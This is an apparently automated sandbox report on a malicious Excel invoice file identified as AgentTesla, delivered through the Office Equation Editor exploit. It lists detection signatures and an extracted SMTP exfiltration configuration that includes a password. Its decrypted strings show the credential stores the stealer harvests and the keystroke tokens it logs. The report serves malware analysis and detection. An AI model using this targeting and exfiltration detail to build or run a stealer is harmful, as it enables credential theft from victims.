Windows Analysis Report
Fatura 002.xlam.xlsx

Overview

General Information

Sample name:	Fatura 002.xlam.xlsx
Analysis ID:	1523149
MD5:	404eec23afb533475c11493f7d367ec0
SHA1:	844ba233d3ba4ecc44596bc78f90eecffd0286de
SHA256:	eab869eef3b586266919e8d303d196beeb0f22d3f3cbc7b1f521a7e67acd4cf5
Tags:	xlamxlsxuser-abuse_ch
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected AgentTesla

Document exploit detected (process start blacklist hit)

Installs new ROOT certificates

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Shellcode detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains an invalid checksum

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Fatura 002.xlam.xlsx

Avira: detected

Found malware configuration

Source: 6.2.RegSvcs.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.solucionesmexico.mx", "Username": "security@solucionesmexico.mx", "Password": " Qdk,[nKrmI0j "}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: Fatura 002.xlam.xlsx	Virustotal: Detection: 50%			Perma Link
Source: Fatura 002.xlam.xlsx	ReversingLabs: Detection: 71%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: /log.tmp
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>[
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: yyyy-MM-dd HH:mm:ss
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ]<br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Time:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>User Name:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>Computer Name:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>OSFullName:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>CPU:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>RAM:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IP Address:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <hr>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: New
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IP Address:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: true
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: mail.solucionesmexico.mx
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: security@solucionesmexico.mx
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Qdk,[nKrmI0j
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: security@solucionesmexico.mx
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MBecZ
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MBecZ.exe
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MBecZ
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: true
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Type
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \drivers\etc\hosts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <hr>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <b>[
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ]</b> (
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: )<br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {BACK}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {ALT+TAB}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {ALT+F4}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {TAB}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {ESC}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {Win}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {CAPSLOCK}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {KEYUP}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {KEYDOWN}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {KEYLEFT}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {KEYRIGHT}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {DEL}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {END}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {HOME}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {Insert}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {NumLock}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {PageDown}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {PageUp}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {ENTER}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F1}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F2}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F3}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F4}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F5}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F6}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F7}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F8}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F9}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F10}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F11}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F12}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: control
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {CTRL}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: &
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: >
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: "
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br><hr>Copied Text: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <hr>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: logins
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IE/Edge
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Secure Note
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Web Password Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Credential Picker Protector
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Web Credentials
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Credentials
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Domain Certificate Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Domain Password Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Extended Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 00000000-0000-0000-0000-000000000000
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SchemaId
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pResourceElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pIdentityElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pPackageSid
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pAuthenticatorElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IE/Edge
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UC Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UCBrowser\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Login Data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: journal
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: wow_logins
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Safari for Windows
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <array>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <dict>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <string>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </string>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <string>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </string>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <data>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </data>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: -convert xml1 -s -o "
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \fixed_keychain.xml"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Protect\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: QQ Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Tencent\QQBrowser\User Data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Default\EncryptedStorage
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Profile
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \EncryptedStorage
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: entries
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: category
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: str3
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: str2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: blob0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: password_value
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IncrediMail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PopPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmtpPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\IncrediMail\Identities\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Accounts_New
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PopPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmtpPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmtpServer
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: EmailAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Eudora
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: current
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Settings
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SavePasswordText
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Settings
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ReturnAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Falkon Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \falkon\profiles\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: profiles.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: profiles.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \browsedata.db
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: autofill
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ClawsMail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Claws-mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \clawsrc
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \clawsrc
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passkey0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: master_passphrase_salt=(.+)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \accountrc
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: smtp_server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: address
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \passwordstorerc
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {(.),(.)}(.*)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Flock Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Flock\Browser\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: signons3.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: DynDns
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ALLUSERSPROFILE
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Dyn\Updater\config.dyndns
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: username=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: password=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: https://account.dyn.com/
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: t6KzXhCh
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ALLUSERSPROFILE
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Dyn\Updater\daemon.cfg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: global
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: account.
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: username
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: account.
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Psi/Psi+
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: name
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Psi/Psi+
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Psi\profiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Psi+\profiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \accounts.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \accounts.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: OpenVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\OpenVPN-GUI\configs\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: username
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: auth-data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: entropy
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: USERPROFILE
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \OpenVPN\config\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: remote
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: remote
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: NordVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: NordVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: NordVpn.exe*
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: user.config
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: //setting[@name='Username']/value
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: //setting[@name='Password']/value
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: NordVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Private Internet Access
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: %ProgramW6432%
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Private Internet Access\data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Private Internet Access\data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \account.json
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ."username":"(.?)"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ."password":"(.?)"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Private Internet Access
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: privateinternetaccess.com
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FileZilla
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Server>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Host>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Host>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </Host>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Port>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </Port>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <User>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <User>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </User>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Pass encoding="base64">
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Pass encoding="base64">
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </Pass>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Pass>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Pass encoding="base64">
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </Pass>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: CoreFTP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: User
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Host
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Port
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: hdfzpysvpzimorhk
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: WinSCP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HostName
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UserName
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PublicKeyFile
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PortNumber
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: WinSCP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ABCDEF
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Flash FXP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: port
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: user
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pass
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: quick.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Sites.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FlashFXP\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FlashFXP\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FTP Navigator
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FTP Navigator\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: No Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: User
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmartFTP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: WS_FTP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HOST
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PWD=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PWD=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FtpCommander
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \cftp\Ftplist.txt
